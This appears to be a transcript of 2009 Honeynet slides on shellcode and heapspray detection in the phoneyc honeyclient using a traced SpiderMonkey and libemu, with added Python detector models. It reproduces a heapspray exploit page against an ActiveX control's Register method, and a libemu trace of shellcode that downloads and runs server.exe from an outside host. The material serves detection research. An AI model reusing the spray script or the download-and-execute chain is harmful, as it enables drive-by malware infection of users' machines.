Shellcode and heapspray detection in phoneyc
Transcript of "Shellcode and heapspray detection in phoneyc"

  1. Shellcode and heapspray detection in phoneyc (phoneyc with libemu)
     Zhijie Chen, Honeynet Project Chinese Chapter
     Honeynet Project on Google Summer of Code, 2009
  2. Contents
     1 Introduction to phoneyc
     2 A Typical Web-Based Malware
     3 Shellcode detection using Libemu
     4 Tracing Mozilla Spidermonkey
       Basic Principles of Spidermonkey
     5 Shellcode Detection in phoneyc
       Basic Idea
       Details
       Related Source files
       Implementation
     6 Heapspray Detection
     7 Current Results
  4. Introduction to phoneyc
     http://code.google.com/p/phoneyc/
     - A Python honeyclient
     - Originally written by Jose Nazario
     - Purpose: to detect web-based malware
  6. A Typical Heapspray Mal-javascript (slides 6 and 7)
       <body>
       <script>window.onerror=function(){return true;}</script>
       <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display:none' id='target'></object>
       <SCRIPT language="javascript">
       var shellcode = unescape("%u9090"+"%u9090"+
       ...(shellcode)
       "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000");
       </script>
       <SCRIPT language="javascript">
       var bigblock = unescape("%u9090%u9090");
       var headersize = 20;
       var slackspace = headersize+shellcode.length;
       while (bigblock.length<slackspace) bigblock+=bigblock;
       fillblock = bigblock.substring(0, slackspace);
       block = bigblock.substring(0, bigblock.length-slackspace);
       while(block.length+slackspace<0x40000) block = block+block+fillblock;
       memory = new Array();
       for (x=0; x<100; x++) memory[x] = block +shellcode;
       var buffer = '';
       while (buffer.length < 1024) buffer+="\x05";
       var ok="1111";
       target.Register(ok,buffer);
       </script>
       </body>
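The following Python block is an added example, not code from the slides or from phoneyc. It decodes the legacy JS `unescape("%u...")` form into the UTF-16 code units SpiderMonkey stores (so the bytes can be handed to a shellcode scanner such as libemu), and replays the `bigblock`/`fillblock`/`block` arithmetic of the sample to measure what the spray actually allocates. The shellcode used here is constructed from only the visible head (two NOP units) and the visible URL tail of the slide's string; the real shellcode in the middle is elided on the slide.

```python
# Added example: decode the JS unescape("%u...") string form and measure the
# heapspray layout of the sample script. Not phoneyc's or the slides' own code.
import re

# Legacy unescape(): %uXXXX -> one UTF-16 code unit, %XX -> one code unit 0..255.
_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

# Constructed sample: only the head and tail visible on the slide, middle omitted.
SAMPLE_SHELLCODE_ESCAPED = (
    "%u9090%u9090"
    "%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000"
)


def js_unescape(s: str) -> str:
    """Mimic the legacy JS unescape(); unmatched '%' sequences are left as-is."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_string_bytes(s: str) -> bytes:
    """Raw little-endian UTF-16 bytes of a JS string: what a sled/shellcode scanner sees."""
    return s.encode("utf-16-le", errors="surrogatepass")


def spray_layout(shellcode: str, target_units: int = 0x40000,
                 header_size: int = 20, copies: int = 100) -> dict:
    """Replay the sample's spray arithmetic (bigblock/fillblock/block) on one copy
    and return the sizes; lengths are in UTF-16 code units like JS .length."""
    bigblock = js_unescape("%u9090%u9090")
    slackspace = header_size + len(shellcode)
    while len(bigblock) < slackspace:
        bigblock += bigblock
    fillblock = bigblock[:slackspace]
    block = bigblock[:len(bigblock) - slackspace]
    # block + slackspace doubles each round, so it stops at exactly target_units.
    while len(block) + slackspace < target_units:
        block = block + block + fillblock
    chunk_units = len(block) + len(shellcode)   # memory[x] = block + shellcode
    return {
        "sled_units": len(block),
        "chunk_units": chunk_units,
        "chunk_bytes": chunk_units * 2,
        "copies": copies,
        "total_bytes": chunk_units * 2 * copies,
    }


if __name__ == "__main__":
    sc = js_unescape(SAMPLE_SHELLCODE_ESCAPED)
    print("shellcode bytes:", js_string_bytes(sc))
    print("spray layout:", spray_layout(sc))
```

Two things fall out of the arithmetic: `block.length + slackspace` starts at a power of two and doubles every iteration, so each sprayed string is exactly `0x40000 - headersize` code units regardless of the shellcode length, and the 100 copies of a near-512 KiB string are what makes the heap fill predictable for the attacker (and conspicuous for a detector).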
  8. Heap Status After Heapspray
     [ more than ??MB of 0x90 (NOP)s or other x86 instructions as a sled | shellcode ]
  9. Detecting Shellcode/Heapspray
     SC/HS detecting tool: how to detect it?
 11. Introduction to libemu
     From its official site: "libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics."
     Using libemu one can:
     - detect shellcode
     - execute the shellcode
     - profile shellcode behaviour
     On using libemu to detect shellcode and heapspray in web-based malware, see "Defending browsers against drive-by downloads: Mitigating heap-spraying code injection attacks".
 12. Detecting x86 Instructions
     SC/HS detecting time: when to detect it?
 14. Introduction to spidermonkey
     What is SpiderMonkey?
     SpiderMonkey is the code-name for Mozilla's C implementation of JavaScript. (http://www.mozilla.org/js/spidermonkey/)
 15. Basic Principles of Spidermonkey
     - All JavaScript source is compiled into JS bytecode.
     - An interpreter executes the bytecode, each opcode doing one simple action.
     - All JavaScript variables are stored as jsval.
     - Some values, such as strings, are stored as an "atom".
 17. Basic Idea
     Both the manipulation of the shellcode and the spraying of the fillblock involve assignments. So if we can interrupt SpiderMonkey when it interprets the bytecodes that implement an assignment, and check the assigned value for shellcode, the shellcode is detected the moment it is assigned.
 18. Details I
     The following JS code:
       function a(){b="c"; var a = 0;}
     is compiled into bytecode like:
       00000: bindname "b"
       00003: string "c"
       00006: setname "b"
       00009: pop
       00010: zero
       00011: setvar 0
       00014: pop
       00015: stop
     So if we examine the argument of each set* opcode on the top of the stack at runtime, shellcode cannot slip past.
 19. Details
     To do so, we need to:
     - Step-trace the SpiderMonkey runtime.
     - Stop at the key bytecodes (setname, setvar, setprop, setarg etc.) for all kinds of assignments. Unfortunately, different assignments compile to different bytecodes. But all assignment-related opcodes share the JOF_SET bit in their opcode description structure (./src/jsopcode.h), so the handler can test that flag instead of enumerating opcodes.
 20. Related Source files to be used later
     - jsapi.h: basic APIs for JavaScript execution.
     - jsdbgapi.h: basic APIs for debugging SpiderMonkey.
     - jsopcode.tbl: all the JS opcodes (bytecodes).
     - jsinterp.c: how each bytecode is interpreted.
 21. Implementation
     - Register a trace handler in SpiderMonkey using JS_SetInterrupt. This handler is called at each step of bytecode execution.
     - In the handler:
       - Use JS_GetTrapOpcode to get the current opcode (bytecode).
       - Use JS_FrameIterator to get the current runtime stack.
       - Check the r-value of set* bytecodes on the top of the stack with libemu.
       - Dump the shellcode and alert.
       - Continue the execution.
     - Provide this traced JS virtual machine as a Python module named honeyjs, so the other parts of phoneyc can use it just like python-spidermonkey, with optional awareness of the extra shellcode/heapspray detection APIs.
 23. Basic Idea
     Heapspray:
     - a myriad of NOP-like x86 instructions,
     - accumulated through a loop of assignments,
     - with shellcode at the end of each sled.
 24. Basic Idea (continued)
     Detection of the heapspray described above:
     - Now: a counter that records the mal-assignments (assignments whose r-value contains shellcode).
     - In the future: entropy? The Nozzle way?
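The following Python block is an added example covering the shellcode-detection procedure of slides 17 to 21 and the mal-assignment counter of slides 23 and 24; it is not honeyjs or phoneyc code. The per-bytecode handler, the JOF_SET opcode filter, the check of each assignment's r-value and the hit counter are modelled on a constructed `(opcode, r-value)` trace so the pipeline runs offline. libemu is replaced by a tiny pattern matcher for two classic GetPC idioms; the real module hands the bytes to libemu, which emulates them. The opcode names `setelem` and `setlocal`, the demo payload, and the spray threshold of 50 are assumptions, not taken from the slides.

```python
# Added example (not honeyjs/phoneyc code): the set*-opcode trace handler and
# the mal-assignment counter from the slides, run on a constructed trace.
import re
from collections import Counter

# Opcodes carrying JOF_SET in jsopcode.tbl. The first four are named on the
# slides; setelem/setlocal are an assumption about the same table.
JOF_SET_OPCODES = {"setname", "setvar", "setprop", "setarg", "setelem", "setlocal"}

# Stand-in for libemu's GetPC heuristic: two classic "get EIP" idioms.
# libemu emulates the bytes; this only pattern-matches and can false-positive.
GETPC_IDIOMS = [
    (re.compile(rb"\xe8\x00\x00\x00\x00"), "call $+5 / pop"),
    (re.compile(rb"\xd9\x74\x24\xf4"), "fnstenv [esp-0xc]"),
]


def find_getpc(data: bytes):
    """Return (offset, idiom) of the earliest GetPC idiom in data, or None."""
    best = None
    for pat, name in GETPC_IDIOMS:
        m = pat.search(data)
        if m and (best is None or m.start() < best[0]):
            best = (m.start(), name)
    return best


def sled_length(data: bytes, end: int, nop: int = 0x90) -> int:
    """Number of NOP bytes immediately before offset `end` (the sled in front of GetPC)."""
    i = end
    while i > 0 and data[i - 1] == nop:
        i -= 1
    return end - i


class HoneyJSTrace:
    """Models the JS_SetInterrupt handler: inspect the r-value of every JOF_SET
    opcode, run the shellcode check, and count repeated hits for heapspray."""

    def __init__(self, spray_threshold: int = 50):
        self.spray_threshold = spray_threshold   # assumed value, not from the slides
        self.hits = Counter()                     # signature -> mal-assignment count
        self.info = {}                            # signature -> (idiom, sled bytes)

    def on_step(self, opcode: str, rvalue):
        """Called once per bytecode; returns the signature when rvalue holds shellcode."""
        if opcode not in JOF_SET_OPCODES or not isinstance(rvalue, str):
            return None
        data = rvalue.encode("utf-16-le", "surrogatepass")  # bytes as SpiderMonkey stores them
        hit = find_getpc(data)
        if hit is None:
            return None
        offset, idiom = hit
        sig = (offset, len(data))   # stand-in for the string address libemu reports
        self.hits[sig] += 1
        self.info[sig] = (idiom, sled_length(data, offset))
        return sig

    def report(self):
        """Final alerts, one per distinct shellcode, labelled like phoneyc's output."""
        alerts = []
        for sig, n in sorted(self.hits.items()):
            idiom, sled = self.info[sig]
            label = "Shellcode Detected"
            if n >= self.spray_threshold:
                label = "Shellcode & Potential heapspray sledge"
            alerts.append({"sig": sig, "label": label, "hits": n,
                           "idiom": idiom, "sled_bytes": sled})
        return alerts


# Constructed demo payload (not the slides' real shellcode): NOPs, call $+5 / pop eax,
# then the download URL as data. It is a marker for the scanner, not working code.
SHELLCODE = (b"\x90\x90\x90\x90\xe8\x00\x00\x00\x00\x58"
             b"http://1v1.name/server.exe\x00\x00").decode("utf-16-le", "surrogatepass")


def sample_trace():
    """Constructed (opcode, r-value) sequence mimicking the sample page's execution."""
    sled = "\u9090" * 1000
    events = [("setname", "hello"), ("setvar", 0), ("setname", SHELLCODE)]
    events += [("setelem", sled + SHELLCODE) for _ in range(100)]  # memory[x] = block + shellcode
    events.append(("setprop", "\u9090" * 8))   # NOPs without a GetPC: not flagged
    return events


def run(events, spray_threshold: int = 50):
    tracer = HoneyJSTrace(spray_threshold)
    for opcode, rvalue in events:
        tracer.on_step(opcode, rvalue)
    return tracer.report()


if __name__ == "__main__":
    for a in run(sample_trace()):
        print("[ALERT] %s -> %s HIT: %d (%s, sled %d bytes)"
              % (a["sig"], a["label"], a["hits"], a["idiom"], a["sled_bytes"]))
```

Keying hits by (GetPC offset, string length) is what makes the standalone `shellcode` assignment and the 100 `memory[x]` assignments show up as separate entries with hit counts 1 and 100, mirroring the two kinds of alert in the run on the next slides; a pure counter with no sled measurement is exactly the "now" column of slide 24, and `sled_bytes` is the extra signal an entropy- or Nozzle-style check would build on.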
 26. A Run on ssreader_0day.html (slides 26 and 27)
       joyan@Jdeb:~/code/phoneyc$ sh go.sh
       HONEYCLIENT MODULE TEST
       fetching http://172.31.25.227/phoneyc/ssreader_0day.html
       []
       ==> http://172.31.25.227/phoneyc/ssreader_0day.html
       JS EVAL
       Executing Javascript:
       DEBUG: !!!SC DETECTED at 141847268=141847572size:374
       DEBUG: !!!SC DETECTED at 141847524=141847756size:32728
       DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
       DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
       ...
       DEBUG: !!!SC DETECTED at 141723488=141847756size:32728
       SSReader Pdg2 Register method overflow
       [ALERT] 0: 141847268 -> Shellcode Detected HIT: 1
       Runing shellcode... offset:248
       DEBUG: Begin analyzing ...
       DEBUG: download http://1v1.name/server.exe -> c:\WINDOWS\system32\a.exe
       ...
       URLs:['http://1v1.name/server.exe', 'http://1v1.name/server.exe']
       Done
       [ALERT] 0: 141847524 -> Shellcode Detected HIT: 1
       [ALERT] 0: 141723488 -> Shellcode & Potential heapspray sledge HIT: 100
       VBS EVAL
       IFRAMES []
       HREFS []
       FRAMES []
       IMAGES []
 28. Analysis of The Shellcode using libemu (slides 28 to 30)
       FARPROC WINAPI GetProcAddress (
           HMODULE hModule = 0x7c800000 =>
               none;
           LPCSTR lpProcName = 0x0041710c =>
               = "GetSystemDirectoryA";
       ) = 0x7c814eea;
       FARPROC WINAPI GetProcAddress (
           HMODULE hModule = 0x7c800000 =>
               none;
           LPCSTR lpProcName = 0x00417120 =>
               = "WinExec";
       ) = 0x7c86136d;
       FARPROC WINAPI GetProcAddress (
           HMODULE hModule = 0x7c800000 =>
               none;
           LPCSTR lpProcName = 0x00417128 =>
               = "ExitThread";
       ) = 0x7c80c058;
       FARPROC WINAPI GetProcAddress (
           HMODULE hModule = 0x7c800000 =>
               none;
           LPCSTR lpProcName = 0x00417133 =>
               = "LoadLibraryA";
       ) = 0x7c801d77;
       HMODULE LoadLibraryA (
           LPCTSTR lpFileName = 0x00417140 =>
               = "urlmon";
       ) = 0x7df20000;
       FARPROC WINAPI GetProcAddress (
           HMODULE hModule = 0x7df20000 =>
               none;
           LPCSTR lpProcName = 0x00417147 =>
               = "URLDownloadToFileA";
       ) = 0x7df7b0bb;
       UINT GetSystemDirectory (
           LPTSTR lpBuffer = 0x0012fe5f =>
               none;
           UINT uSize = 32;
       ) = 19;
       HRESULT URLDownloadToFile (
           LPUNKNOWN pCaller = 0x00000000 =>
               none;
           LPCTSTR szURL = 0x0041715a =>
               = "http://1v1.name/server.exe";
           LPCTSTR szFileName = 0x0012fe5f =>
               = "c:\WINDOWS\system32\a.exe";
           DWORD dwReserved = 0;
           LPBINDSTATUSCALLBACK lpfnCB = 0;
       ) = 0;
       UINT WINAPI WinExec (
           LPCSTR lpCmdLine = 0x0012fe58 =>
               = "cmd /c c:\WINDOWS\system32\a.exe";
           UINT uCmdShow = 0;
       ) = 32;
 31. Thank you!